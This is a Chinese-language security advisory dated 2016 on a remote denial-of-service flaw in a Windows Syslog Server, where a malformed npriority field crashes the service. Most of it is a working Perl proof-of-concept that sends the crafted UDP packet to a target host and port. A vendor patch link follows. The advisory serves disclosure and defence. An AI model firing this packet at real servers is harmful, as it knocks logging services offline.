Syslog Server "npriority"字段远程拒绝服务漏洞
发布日期:2016-07-04
更新日期:2016-07-07
受影响系统:
描述:
Syslog Server是适用于Windows系统的syslog服务器。
syslog Server未能处理npriority字段的内容,存在安全漏洞,构造的数据包可导致服务器崩溃。
<*来源:ChaoYi.Huang_at_connect.polyu.hk
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl -w
#PoC by demonalex (chaoyi.huang_at_connect.polyu.hk || demonalex_at_163.com)
use IO::Socket;
use POSIX qw(strftime);
$|=1;
$host=shift;
$port=shift;
die "Usage: $0 \$host \$port\n" if ((!defined($host)) || (!defined($port)));
$npriority = '<A>';
$ndate = strftime "%b%e %H:%M:%S", localtime;
$nhostname = "10.0.0.2";
$npid = 'fuzzer[10]';
$nmsg = "Syslog Fuzzer v2";
$header = $ndate.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>$host);
$con->send($packet);
print "Done!\n";
$con->close;
exit(0);
建议:
厂商补丁:
Syslog Server
-------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://sourceforge.net/p/syslog-server/